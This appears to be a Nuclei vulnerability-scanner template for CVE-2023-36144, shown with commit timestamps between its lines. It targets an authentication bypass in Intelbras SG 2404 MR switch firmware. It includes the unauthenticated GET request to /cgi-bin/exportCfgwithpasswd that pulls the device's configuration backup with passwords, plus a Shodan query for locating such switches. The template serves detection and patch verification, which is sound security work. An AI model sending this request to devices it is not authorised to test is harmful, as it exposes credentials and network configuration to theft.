2023-11-23 09:22:57 +00:00
id : CVE-2023-36144
info :
2023-12-08 07:46:12 +00:00
name : Intelbras Switch - Information Disclosure
2023-11-23 09:22:57 +00:00
author : gy741
severity : high
description : |
An authentication bypass in Intelbras Switch SG 2404 MR in firmware 1.00.54 allows an unauthenticated attacker to download the backup file of the device, exposing critical information about the device configuration.
remediation : |
Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2023-36144
- https://github.com/leonardobg/CVE-2023-36144
2023-12-12 11:07:52 +00:00
- http://intelbras.com
2024-01-29 17:11:14 +00:00
- https://github.com/nomi-sec/PoC-in-GitHub
2023-11-23 09:22:57 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2023-36144
cwe-id : CWE-862
2024-03-23 09:28:19 +00:00
epss-score : 0.02858
epss-percentile : 0.90492
2023-11-23 09:22:57 +00:00
cpe : cpe:2.3:o:intelbras:sg_2404_mr_firmware:1.00.54:*:*:*:*:*:*:*
2023-12-08 07:46:12 +00:00
metadata :
max-request : 1
2023-12-12 11:07:52 +00:00
vendor : intelbras
product : sg_2404_mr_firmware
2023-12-08 07:46:12 +00:00
shodan-query : title:"Intelbras"
2024-01-14 09:21:50 +00:00
tags : cve2023,cve,intelbras,switch,exposure
2023-11-23 09:22:57 +00:00
http :
- method : GET
path :
- '{{BaseURL}}/cgi-bin/exportCfgwithpasswd'
matchers-condition : and
matchers :
- type : word
2023-12-08 07:46:12 +00:00
part : body
2023-11-23 09:22:57 +00:00
words :
- 'System Description'
- 'System Version'
- 'System Name'
condition : and
2023-12-08 07:46:12 +00:00
- type : word
part : header
words :
- 'attachment;filename='
2023-11-23 09:22:57 +00:00
- type : status
status :
- 200
2024-03-25 11:57:16 +00:00
# digest: 4b0a00483046022100c87539b230266de86c5cb08d7a6ad9aaaeb4263821230046e194e05e8a0174c4022100f43f59553b68b72f32bd7190982615fd429469fe92dedf5ac1147322a2b44bf9:922c64590222798bb761d5b6d8e72950